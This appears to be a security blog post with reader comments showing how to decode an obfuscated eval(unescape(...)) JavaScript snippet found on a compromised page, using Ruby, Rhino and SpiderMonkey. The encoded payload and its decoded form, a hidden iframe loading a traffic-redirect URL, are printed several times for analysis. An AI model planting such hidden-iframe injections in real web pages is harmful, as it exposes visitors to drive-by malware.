I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.
So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));
Which this:
ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'
Returns this:
"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"
2 comments:
Another tool for playing with malicious or obfuscated JavaScript that I like is the Rhino JavaScript shell.
$ bin/java -classpath rhino1_6R7/js.jar org.mozilla.javascript.tools.shell.Main
Rhino 1.6 release 7 2007 08 19
js> unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64
%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%6
5%3d%39%61%37%62%34%37%32%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%
76%65%6d%79%6c%6f%76%65%73%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35%3
2%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64%74%68%3d%32%30%
31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79
%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")
window.status='Done';document.write('<iframe name=9a7b4722 src=\'hxxp://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')
js>
http://www.mozilla.org/rhino/
It's command-line fast & easy, but also gives you an environment to play with the code in (for instance, changing document.write to print)
Thanks, Paul. I've tried Rhino but prefer the speed of SpiderMonkey. They're the same Javascript engine, but SpiderMonkey is written in C while Rhino is in Java--it has the same CLI functionality and environment to plan in.
mezzanine:~ jsawyer$ js -v
JavaScript-C 1.6 2006-11-19
usage: js [-PswWxC] [-b branchlimit] [-c stackchunksize] [-v version] [-f scriptfile] [-e script] [-S maxstacksize] [scriptfile] [scriptarg...]
mezzanine:~ jsawyer$ js
js> unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29");
window.status='Done';document.write('<iframe name=9a7b4722 src=\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')
Also, the modified SpiderMonkey by Didier Stevens that I mentioned doesn't require you to manually modify the code for document.write's and eval's. When you run it, it will automatically write the content respective files.
mezzanine:tmp jsawyer$ js-1.5-didier poo
poo:1: ReferenceError: window is not defined
mezzanine:tmp jsawyer$ cat eval.001.log
window.status='Done';document.write('<iframe name=9a7b4722 src=\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')
Do you know if there are any enhancements to Rhino that are not in SpiderMonkey? I noticed it has a much newer build date.
Post a Comment